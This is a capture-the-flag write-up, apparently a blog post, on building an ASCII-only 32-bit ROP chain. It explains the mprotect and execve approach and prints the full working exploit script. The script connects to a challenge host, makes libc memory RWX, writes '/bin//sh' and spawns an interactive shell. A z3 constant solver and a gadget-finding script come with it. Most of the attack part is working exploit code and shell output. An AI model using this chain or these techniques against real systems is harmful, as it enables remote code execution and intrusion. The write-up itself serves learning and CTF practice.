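Every dword placed on the stack, whether a gadget address or a constant popped into a register, has to pass this check.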

The exploit with quoted gadgets is provided at the end of this post, but before I get there, here are some notes on my approach:

  • For gadget gathering I used a custom distorm3-based script that outputted only gadgets on ASCII-friendly addresses (it's at the end of the post).
  • Initial idea was to use mmap syscall to allocate a new RWX memory area, but that plan backfired since 32-bit mmap requires a defined structure in memory and I didn't really have an easy way to access writable memory (non-ASCII-friendly addresses).
  • Eventually I went after mprotect syscall to change 0x5555E000 area's permissions to RWX; mprotect required me to control 3 registers for parameters (EBX, ECX and EDX) and EAX for syscall number (and, as it turned out, ESI for the syscall invocation).
  • I started by doing a simple experiment to check how flexible mprotect's parameters really are (I've done it in a separate simple test program); thanks to this I found out that:
    - The address parameter MUST be page aligned (well, I actually already knew that).
    - The size parameter can be anything large; if it's too large mprotect returns an error, but still successfully remaps the existing pages to desired access rights (this I didn't know).
    - The protection flags (permissions) parameter isn't too flexible; value 0xF (instead of 7) still worked, but that's about it (any other bytes set made mprotect fail).
  • The first gadget I found was EB FE (jmp $ - i.e. infinite loop) which is super useful for debugging purposes (i.e. checking until what moment the ROP chain works correctly).
  • The rest of the way I went register-by-register, focusing on a single one until I was able to assign it the desired value.
  • For EDX (see setup_edx_flags) register I used three ASCII-friendly subtractions to get value 7 (representing RWX) into the register. The values themselves (0x6b5e7b63 - 0x3b363f38 - 0x30283c24 → 7) were generated using a simple helper z3 script (attached after the exploit near the end of this post). A lot of registers were corrupted due to the low quality of gadgets I had, so it was first on the execution list.
  • For EBX (see setup_ebx_addr) register I used three ASCII-friendly xor's to get address 0x55562000. Note that this isn't the beginning of the memory area, since you cannot get bytes with most significant bits set using ASCII-friendly xor's (i.e. you couldn't get the 0xE0 byte from 0x5555E000; but that's OK). Again, the values I've used were z3 generated (0x28243062 ^ 0x24222c22 ^ 0x59503c40 → 0x55562000).
  • For EAX (see setup_eax_mprotect) I've initially set the register to 0x4141417d and then used a movzx eax, al gadget to clear the top 24 bits, leaving only 0x7d (i.e. the mprotect syscall number).
  • For ECX I didn't have to do anything, as it already had a sufficiently large value when the syscall was to be executed. Lucky me :)
  • Invoking the syscall (or actually an int 0x80 gadget) turned out to be tricky, as none of the gadgets were on ASCII-friendly addresses. I've ended up calculating the gadget address into the ESI register (again, courtesy of z3: 0x69787631 + 0x7c74247b + 0x6f783045 → 0x5564caf1) and then using a fun little push esi; ret gadget which jumped to the int 0x80.
  • The above chain piece gave me a writable and executable memory area. I initially thought of putting a shellcode there, but in the end it was sufficient to put (see poke) "/bin//sh" string on an address that had a null-byte naturally occurring at the end of said string, and then use that for execve function call (not to be confused with the execve syscall).
  • I've jumped to the execve function using exactly the same method I used to jump to the int 0x80 gadget. The parameters (on the stack, as, again, it was a function call and not a syscall invocation) included the address of the aforementioned "/bin//sh\0" string, followed by two addresses of a NULL ptr in memory (these would be treated as "empty argv" and "empty envp" tables).
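The arithmetic from the notes above is easy to double-check, and for the XOR case a solver is not strictly needed, since XOR works on each byte independently. The sketch below re-computes the constants quoted in the list and finds an XOR triple with a plain per-byte search. It is an alternative illustration and not the z3 helper script mentioned in the post; the 0x21..0x7e byte range is an assumption.

```python
from itertools import product

ALLOWED = range(0x21, 0x7F)   # assumed set of acceptable bytes
MASK32 = 0xFFFFFFFF

def xor_triple(target):
    """Three dwords made only of allowed bytes whose XOR is `target`,
    or None if some byte of the target cannot be produced."""
    parts = [0, 0, 0]
    for shift in (0, 8, 16, 24):
        want = (target >> shift) & 0xFF
        for a, b in product(ALLOWED, repeat=2):
            c = want ^ a ^ b
            if c in ALLOWED:
                break
        else:
            return None
        for i, byte in enumerate((a, b, c)):
            parts[i] |= byte << shift
    return tuple(parts)

# Constants quoted in the notes above.
edx = (0x6B5E7B63 - 0x3B363F38 - 0x30283C24) & MASK32
ebx = 0x28243062 ^ 0x24222C22 ^ 0x59503C40
esi = (0x69787631 + 0x7C74247B + 0x6F783045) & MASK32
eax = 0x4141417D & 0xFF

triple = xor_triple(0x55562000)
print(hex(edx), hex(ebx), hex(esi), hex(eax), [hex(v) for v in triple])
print(xor_triple(0x5555E000))
```

The second search fails because three bytes below 0x80 can never XOR to 0xE0, which is the reason 0x55562000 was used instead of the start of the mapping.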

And that was it.

gynvael:haven> python pwnbase.py 
Final ROP length: 312
You maybe feel some familiar with this challenge ? 
Yes, I made a little change 
GO : ) 

cat /home/char/flag
flag{Asc11_ea3y_d0_1t???}

A pretty fun task :)

The full exploit follows (and the z3 script is at the bottom).

#!/usr/bin/python
import sys
import socket
import telnetlib 
import os
import time
from struct import pack, unpack

def recvuntil(sock, txt):
  d = ""
  while d.find(txt) == -1:
    try:
      dnow = sock.recv(1)
      if len(dnow) == 0:
        print "-=(warning)=- recvuntil() failed at recv"
        print "Last received data:"
        print d
        return False
    except socket.error as msg:
      print "-=(warning)=- recvuntil() failed:", msg
      print "Last received data:"
      print d      
      return False
    d += dnow
  return d

def recvall(sock, n):
  d = ""
  while len(d) != n:
    try:
      dnow = sock.recv(n - len(d))
      if len(dnow) == 0:
        print "-=(warning)=- recvall() failed at recv"
        print "Last received data:"
        print d
        return False
    except socket.error as msg:
      print "-=(warning)=- recvall() failed:", msg
      print "Last received data:"
      print d      
      return False
    d += dnow
  return d

# Proxy object for sockets.
class gsocket(object):
  def __init__(self, *p):
    self._sock = socket.socket(*p)

  def __getattr__(self, name):
    return getattr(self._sock, name)

  def recvall(self, n):
    return recvall(self._sock, n)

  def recvuntil(self, txt):
    return recvuntil(self._sock, txt)  

# Base for any of my ROPs.
def db(v):
  return pack("<B", v)

def dw(v):
  return pack("<H", v)

def dd(v):
  return pack("<I", v)

def dq(v):
  return pack("<Q", v)

def rb(v):
  return unpack("<B", v[0])[0]

def rw(v):
  return unpack("<H", v[:2])[0]

def rd(v):
  return unpack("<I", v[:4])[0]

def rq(v):
  return unpack("<Q", v[:8])[0]

def set1(ebx=0x41414141, esi=0x41414141, edi=0x41414141, ebp=0x41414141):
  """
  0x5557506c    pop ebx
  0x5557506d    pop esi
  0x5557506e    pop edi
  0x5557506f    pop ebp
  0x55575070    ret
  """
  return ''.join([
    dd(0x5557506c),
    dd(ebx),
    dd(esi),
    dd(edi),
    dd(ebp)
  ])

def set_ebx(ebx):
  """
  0x556a7742    pop ebx
  0x556a7743    ret
  """
  return ''.join([
    dd(0x556a7742),
    dd(ebx)
  ])

def set_eax(eax):  # Destroys ECX.
  return ''.join([
    set_ecx(eax),
    mov_eax_ecx()
  ])

def set_esi(esi):
  """
  0x55686c72    pop esi
  0x55686c73    ret
  """
  return ''.join([
    dd(0x55686c72),
    dd(esi)
  ])

def set_ecx(ecx):  # AL+0xA
  """
  0x556d2a51    pop ecx
  0x556d2a52    add al, 0xa
  0x556d2a54    ret
  """
  return ''.join([
    dd(0x556d2a51),
    dd(ecx)
  ])

def mov_eax_ecx():
  """
  0x556a6253    mov eax, ecx
  0x556a6255    ret
  """
  return dd(0x556a6253)
  

def set_edx_edi(edx=0x41414141, edi=0x41414141): # Zeroes EAX
  # 0x555f3555    pop edx
  # 0x555f3556    xor eax, eax
  # 0x555f3558    pop edi
  # 0x555f3559    ret
  return ''.join([
    dd(0x555f3555),
    dd(edx),
    dd(edi),
  ])  

def set_ebp(ebp):
  """
  0x5557506f    pop ebp
  0x55575070    ret
  """
  return ''.join([
    dd(0x5557506f),
    dd(ebp)
  ])

def add_esi_ebx():
  """
  0x555c612c    add esi, ebx
  0x555c612e    ret
  """
  return dd(0x555c612c)

def ret_to_esi():
  """
  0x556d262a    push esi
  0x556d262b    ret
  """
  return dd(0x556d262a)

def mov_ptr_edx_edi():
  """
  0x55687b3c    mov [edx], edi
  0x55687b3e    pop esi
  0x55687b3f    pop edi
  0x55687b40    ret
  """
  return ''.join([
    dd(0x55687b3c),
    dd(0x41414141),
    dd(0x41414141),    
  ])

def poke(addr, v):
  return ''.join([
    set_edx_edi(addr, v),
    mov_ptr_edx_edi(),
  ])

def setup_esi_syscall():
  # desired = 0x000EEAF1 + 0x5555E000
  # Constants generated by z3 helper script.
  a2 = 0x69787631
  a1 = 0x7c74247b
  a3 = 0x6f783045
  # Test:  0x5564caf1L (True)

  return ''.join([
    set_esi(a1),
    set_ebx(a2),
    add_esi_ebx(),
    set_ebx(a3),
    add_esi_ebx()    
  ])

def setup_esi_execve():
  # desired = 0xB85E0 + 0x5555E000
  # Constants generated by z3 helper script.
  # sat
  a2 = 0x69747441
  a1 = 0x7378747e
  a3 = 0x78747d21
  # Test:  0x556165e0L (True)

  return ''.join([
    set_esi(a1),
    set_ebx(a2),
    add_esi_ebx(),
    set_ebx(a3),
    add_esi_ebx()    
  ])

def sub_edx_eax():  # Destroys: EAX, ESI, EDI, EBP
  """
  0x5560365c    sub edx, eax
  0x5560365e    pop esi
  0x5560365f    mov eax, edx
  0x55603661    pop edi
  0x55603662    pop ebp
  0x55603663    ret
  """
  return ''.join([
    dd(0x5560365c),
    dd(0x41414141),
    dd(0x41414141),
    dd(0x41414141)    
  ])

def setup_ebx_addr():
  # Constants generated by z3 helper script.
  a2 = 0x28243062
  a1 = 0x24222c22
  a3 = 0x59503c40
  # Test:  0x55562000L (True)

  return ''.join([
    set_ebx(a1),
    set_ebp(a2),
    xor_ebx_ebp(),
    set_ebp(a3),
    xor_ebx_ebp()    
  ])

def setup_edx_flags():
  # Constants generated by z3 helper script.
  a1 = 0x6b5e7b63
  a2 = 0x3b363f38
  a3 = 0x30283c24
  # Manual test: 7 True
  
  return ''.join([
    set_edx_edi(a1),
    set_eax(a2),
    sub_edx_eax(),
    set_eax(a3),
    sub_edx_eax(),
  ])

def zeroext_al():  # Destroys EDI, EBP
  """
  0x55672a79    movzx eax, al
  0x55672a7c    pop edi
  0x55672a7d    pop ebp
  0x55672a7e    ret

  """
  return ''.join([
    dd(0x55672a79),
    dd(0x41414141),
    dd(0x41414141),    
  ])

def setup_eax_mprotect():
  return ''.join([
    set_eax(0x4141417d),  # Low byte 0x7d (125) is mprotect on i386.
    zeroext_al()
  ])
  

def xor_ebx_ebp():
  """
  0x5563364b    xor ebx, ebp
  0x5563364d    ret
  """
  return dd(0x5563364b)

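def ebfe():
  # Named after the bytes EB FE (jmp $), i.e. presumably an infinite-loop
  # gadget that ends the chain.
  return dd(0x55585559)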

def genrop():
  rop = ''.join([
    "AAAA" * 8,  # Padding.

    setup_edx_flags(),    # Don't touch EDX after this. Destroys: EAX ESI
                          #                                       EDI EBP
                          #                                       ECX

    setup_esi_syscall(),  # Don't touch ESI after this. Destroys: EBX

    setup_ebx_addr(),     # Don't touch EBX after this. Destroys: EBP

    setup_eax_mprotect(), # Don't touch EAX after this. Destroys: ECX EDI
                          #                                       EBP

    ret_to_esi(), "AAAA" * 4, # int 0x80 gadget pops 4x regs.

    # Assume from now: 55562000-55702000 rwxp 00004000
    poke(0x55563333 + 0, rd("/bin")),
    poke(0x55563333 + 4, rd("//sh")),

    setup_esi_execve(),  # Don't touch ESI after this. Destroys: EBX

    ret_to_esi(), dd(0x41414141),
    dd(0x55563333), dd(0x556b5274), dd(0x556b5274),  # Args

    ebfe()
  ])

  print "Final ROP length:", len(rop)

  if len(rop) > 2400:
    sys.exit("ROP is waaay too long.")

  # Every byte of the chain has to be printable ASCII (32..126).
  bad = [c for c in rop if ord(c) not in range(32, 127)]
  if bad:
    sys.exit("ROP GEN FAILED:" + ''.join(map(lambda x: hex(ord(x)), bad)))
  
  return rop

def go():  
  global HOST
  global PORT

  rop = genrop()

  #with open("chain.rop", "wb") as f:
  #  f.write(rop)

  #return

  s = gsocket(socket.AF_INET, socket.SOCK_STREAM)
  s.connect((HOST, PORT))
  
  # Put your code here!
  s.sendall(rop)

  # Interactive sockets.
  t = telnetlib.Telnet()
  t.sock = s
  t.interact()

  # Python console.
  # Note: you might need to modify ReceiverClass if you want
  #       to parse incoming packets.
  #ReceiverClass(s).start()
  #dct = locals()
  #for k in globals().keys():
  #  if k not in dct:
  #    dct[k] = globals()[k]
  #code.InteractiveConsole(dct).interact()

  s.close()

HOST = '202.120.7.214'
PORT = 23222
go()
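
The three-constant tricks in the setup_* helpers are easy to get wrong when copying values around, so here is a small stand-alone check of them. It is only a sketch: it is written for Python 3 (unlike the exploit itself), the names CHECKS, combine and verify are made up for this example, and the expected values are taken from the "desired" / "Test" comments in the script above.

```python
# Sanity check (Python 3) of the constants hard-coded in the setup_* helpers.
from functools import reduce
import operator
import struct

MASK = 0xffffffff
LIBC_BASE = 0x5555E000  # Base used in the "desired = ..." comments above.

def is_printable(value):
    """True if all four bytes of a 32-bit value are in the 32..126 range."""
    return all(32 <= b <= 126 for b in struct.pack("<I", value))

def combine(op, values):
    """Fold the values with op, truncating to 32 bits after every step."""
    return reduce(lambda acc, v: op(acc, v) & MASK, values)

# name: (operation, [a1, a2, a3] in the order the chain applies them, expected)
CHECKS = {
    "esi_syscall": (operator.add,
                    [0x7c74247b, 0x69787631, 0x6f783045], LIBC_BASE + 0xEEAF1),
    "esi_execve":  (operator.add,
                    [0x7378747e, 0x69747441, 0x78747d21], LIBC_BASE + 0xB85E0),
    "ebx_addr":    (operator.xor,
                    [0x24222c22, 0x28243062, 0x59503c40], 0x55562000),
    "edx_flags":   (operator.sub,
                    [0x6b5e7b63, 0x3b363f38, 0x30283c24], 7),
}

def verify():
    """Return {name: bool}; True means printable inputs and correct result."""
    results = {}
    for name, (op, values, expected) in CHECKS.items():
        results[name] = (combine(op, values) == expected
                         and all(is_printable(v) for v in values))
    return results
```

Calling verify() returns a dictionary with one boolean per register setup, so a single all(verify().values()) is enough as a guard before sending the chain.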

The z3 helper script used to generate these values boils down to "I can do two additions/subtractions/xors on 32-bit ASCII-friendly values; give me three values that will combine into the desired one":

from z3 import *
import json

desired = 0xB85E0 + 0x5555E000  # The final value.

a1 = BitVec("a1", 32)
a2 = BitVec("a2", 32)
a3 = BitVec("a3", 32)

res = a1 + a2 + a3  # The operation (addition in this case).

s = Solver()
s.add(res == desired)

for a in [a1, a2, a3]:
  for b in [0, 8, 16, 24]:
    bb = ((a >> b) & 0xff)
    s.add(bb > 32, bb <= 126)

print s.check()
s.model()

# Dumping the calculated values and testing the model again.
test = 0
for reg in list(s.model()):
  reg_name = str(reg)
  reg_value = s.model()[reg].as_long()
  test = (test + reg_value) & 0xffffffff
  print "%s = %s" % (reg_name, hex(reg_value))

print "# Test: ", hex(test), "(" + str(test == desired) + ")"
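
For the addition case z3 is not strictly required. As an alternative to the solver (this is not what was used during the CTF), the same kind of split can be built greedily, one byte at a time, while tracking the carry. The sketch below is Python 3, and split_printable_sum is a hypothetical helper name; the 33..126 byte range mirrors the constraint in the z3 script above.

```python
def split_printable_sum(desired, lo=33, hi=126):
    """Return three 32-bit values whose bytes are all in lo..hi and whose
    sum equals desired modulo 2**32."""
    parts = [0, 0, 0]
    carry = 0
    for shift in (0, 8, 16, 24):
        target = (desired >> shift) & 0xff
        # The three bytes plus the incoming carry must equal target mod 256,
        # so the true total is either target or target + 256.
        for total in (target, target + 256):
            need = total - carry
            if 3 * lo <= need <= 3 * hi:
                break
        else:
            raise ValueError("no split for the byte at shift %d" % shift)
        # Greedy split of `need` into three bytes, each within lo..hi.
        b1 = min(hi, need - 2 * lo)
        b2 = min(hi, need - b1 - lo)
        b3 = need - b1 - b2
        for i, b in enumerate((b1, b2, b3)):
            parts[i] |= b << shift
        carry = total >> 8  # Carry into the next, more significant byte.
    return parts


if __name__ == "__main__":
    a1, a2, a3 = split_printable_sum(0xB85E0 + 0x5555E000)
    print(hex(a1), hex(a2), hex(a3))
```

The values it produces differ from the z3 ones, since many valid splits exist; any of them works as long as every byte stays in range. The xor variant is even simpler because the bytes are independent, while subtraction needs borrow tracking instead of carries.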

And the custom ROP gadget gathering script (it only reports gadgets whose address consists solely of printable ASCII bytes):

import distorm3 # https://code.google.com/p/distorm/downloads/list
import struct

# XXX Setup here XXX
TARGET_FILE = "libc.so"          
FILE_OFFSET_START = 0 # In-file offset of scan start
FILE_OFFSET_END = 1717736 # In-file offset of scan end
VA = 0x5555E000 # Note: PC is calculated like this: VA + given FILE_OFFSET
X86_MODE = distorm3.Decode32Bits # Use distorm3.Decode64Bits for 64-bit code
# XXX End of setup XXX

UNIQ = {}
def DecodeAsm(pc, d):
  global X86_MODE

  disasm = distorm3.Decode(pc, d, X86_MODE)

  k = []
  l = ""
  ist = ""

  for d in disasm:
    #print d
    addr = d[0]
    size = d[1]
    inst = d[2].lower()
    t = "0x%x    %s" % (addr,inst)
    l += t + "\n"
    ist += "%s\n" % (inst)
    k.append((addr,inst))
    if inst.find('ret') != -1:
      break

  return (l,k,ist)

d = open(TARGET_FILE, "rb").read()

for i in xrange(FILE_OFFSET_START,FILE_OFFSET_END):
  addr = VA+i
  s = map(lambda x: ord(x) in range(32, 127), struct.pack(">I", addr))
  if not all(s):
    continue

  (cc,kk,ist) = DecodeAsm(VA+i, d[i:i+10])
  if cc.find('ret') == -1:
    continue

  if cc.find('iret') != -1:
    continue

  if cc.find('db ') != -1:
    continue

  if ist in UNIQ:
    continue

  UNIQ[ist] = True  

  print "------> offset: 0x%x" % (i + VA)
  for k in kk:
    print "0x%x    %s" % (k[0],k[1])
    if k[1].find('ret') != -1:
      break

  print ""
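
The part of the script that matters most for this kind of exploit is the address filter, so here it is in isolation. This is a minimal Python 3 sketch using only the standard library; is_printable_addr and printable_offsets are names invented for the example, and the 32..126 range is the same one used in the scripts above.

```python
import struct

def is_printable_addr(addr):
    """True if every byte of the 32-bit address is in the 32..126 range."""
    return all(32 <= b <= 126 for b in struct.pack("<I", addr))

def printable_offsets(va, start, end):
    """Yield file offsets in [start, end) whose address va + offset
    passes the printable check."""
    for off in range(start, end):
        if is_printable_addr((va + off) & 0xffffffff):
            yield off


if __name__ == "__main__":
    # With the base used above, the first usable offset is well past the
    # start of the file, as the low bytes of the address must be printable.
    first = next(printable_offsets(0x5555E000, 0, 0x10000))
    print(hex(first), hex(0x5555E000 + first))
```

Running the filter first and only disassembling at the surviving offsets gives the same set of gadgets as the script above, since a gadget at an unprintable address could not be placed in the chain anyway.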